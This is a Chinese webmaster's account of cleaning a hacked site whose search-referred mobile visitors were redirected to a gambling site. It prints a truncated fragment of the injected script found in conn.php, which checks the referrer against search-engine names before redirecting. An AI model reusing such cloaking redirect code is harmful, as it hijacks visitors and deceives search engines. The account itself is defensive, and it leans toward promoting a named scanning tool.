當(dāng)前位置:首頁 >  站長 >  網(wǎng)站運(yùn)營 >  正文

網(wǎng)站被中木馬并跳轉(zhuǎn)到博彩網(wǎng)的查殺過程

 2020-12-02 10:14  來源: A5用戶投稿   我來投稿 撤稿糾錯(cuò)

  域名預(yù)訂/競價(jià),好“米”不錯(cuò)過

訪問站點(diǎn)只要后面目錄帶apk(不管是文件還是目錄),就會(huì)判斷請求頭,如果為手機(jī)移動(dòng)端的請求頭,就會(huì)跳轉(zhuǎn)到*網(wǎng)站,如果是電腦PC瀏覽器,就會(huì)彈空白頁訪問站點(diǎn),讓你看不到跳轉(zhuǎn)后的網(wǎng)址,只要域名后面地址帶apk(不管是文件還是目錄),就會(huì)判斷請求頭,如果為手機(jī)移動(dòng)端的請求頭,就會(huì)跳轉(zhuǎn)bc網(wǎng)站,如果是電腦瀏覽器,就會(huì)彈空白頁,最近也加上客戶訂單越來越少,領(lǐng)導(dǎo)也是著急,很大一部分客戶渠道來源都從百度點(diǎn)擊來的,靜下心來看看網(wǎng)站到底是怎么回事,不看不要緊,簡直嚇我一跳。網(wǎng)站在百度里的收錄增加許多,本來以為是更新的文章導(dǎo)致的,可是仔細(xì)一想也沒那么多的收錄呀,site:網(wǎng)站,點(diǎn)擊到十頁以后竟然發(fā)現(xiàn)了問題的關(guān)鍵,百度收錄了一大堆我們網(wǎng)站沒有的URL鏈接,復(fù)制那個(gè)我們域名的鏈接,提示不存在,從百度收錄點(diǎn)進(jìn)去跳轉(zhuǎn)到BC網(wǎng)站。

排查過程

最初判斷可能是修改了js文件,但經(jīng)過長時(shí)間的瀏覽,文件內(nèi)容搜索等等該用上的技能都用上了,頭皮都發(fā)麻了,翻了2個(gè)小時(shí),都沒有發(fā)現(xiàn)js修改的一點(diǎn)痕跡,而且發(fā)現(xiàn)這個(gè)服務(wù)器的所有站點(diǎn)都有這個(gè)問題,看起來事情并不簡單,現(xiàn)在的當(dāng)務(wù)之急是盡快解決這個(gè)問題,否則影響太大。通過服務(wù)器的SINESAFE木馬查殺工具,查殺出多個(gè)變形的webshell,以及隱藏屬性無法刪除的木馬文件,本地掃描兩個(gè)上傳文件,火絨均報(bào)毒。

我這才明白過來,原來是我網(wǎng)站被黑了。趕緊打開服務(wù)器里的各個(gè)站點(diǎn),下載網(wǎng)站程序代碼到本地,然后挨個(gè)對每一個(gè)代碼進(jìn)行查看,查看是不是網(wǎng)站被黑客植入了木馬后門,果不其然在每個(gè)網(wǎng)站根目錄里的conn.php發(fā)現(xiàn)了黑客插入的惡意代碼:

functiongo_bots_url(){varinit_flag="apk",bct=document.referrer,bot=['baidu','google','yahoo','bing','soso','sogou','#','so.com','youdao','anquan','sm.cn'];//,'haosou'];for(variinbot){if(bct.indexOf(bot[i])!=-1){init_flag="apk";

去除掉惡意代碼后,網(wǎng)站從百度搜索點(diǎn)擊進(jìn)來的也正常顯示了,真是太*了,在服務(wù)器中查看隱藏屬性的文件普通肉眼是看不到的,需要用專門的SINESAFE木馬查殺工具才能看到,怪不得我找了大半天都沒找到問題根源。接下來的工作就是抓緊修復(fù)網(wǎng)站漏洞,以及對服務(wù)器上的所有站點(diǎn)進(jìn)行排查和漏洞修復(fù),防止被再次攻擊跳轉(zhuǎn),如果大家對程序代碼不太熟悉無法修復(fù)漏洞的話可以到網(wǎng)站安全公司去看看。

申請創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!

相關(guān)標(biāo)簽
木馬病毒
漏洞掃描

相關(guān)文章

熱門排行

信息推薦